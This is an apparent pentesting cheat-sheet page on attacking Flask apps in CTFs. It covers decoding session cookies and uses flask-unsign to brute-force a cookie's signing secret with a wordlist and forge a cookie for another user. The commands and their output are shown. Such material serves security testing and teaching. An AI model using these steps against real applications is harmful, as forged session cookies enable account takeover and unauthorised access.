# Flask

**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection)**.**

Default cookie session name is **`session`**. Decode cookie online [here](https://www.kirsle.net/wizards/flask-session.cgi) or manually by getting the first part of the cookie until the first point and Base64 decode it:\
`echo "ImhlbGxvIg" | base64 -d`

The cookie is signed using a password.

### Flask Unsign

Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.

{% embed url="<https://pypi.org/project/flask-unsign/>" %}

<pre><code><strong>## Decode
</strong><strong>$ flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYXNkZiJ9.YosnvA.92mU6dpP4-5opRXc6h2EhLq8hVI'
</strong>{'logged_in': True, 'username': 'asdf'}

## Brute force
$ flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYXNkZiJ9.YosnvA.92mU6dpP4-5opRXc6h2EhLq8hVI' --no-literal-eval
[*] Session decodes to: {'logged_in': True, 'username': 'asdf'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 17152 attempts
b'secret123'

## Sign
$ flask-unsign --sign --cookie "{'logged_in': True, 'username': 'blue'}" --secret 'secret123'                                                   
eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYmx1ZSJ9.Yos0Lw.Lp1b4zGs-GrDuPvgxv2kkkC3qzE
</code></pre>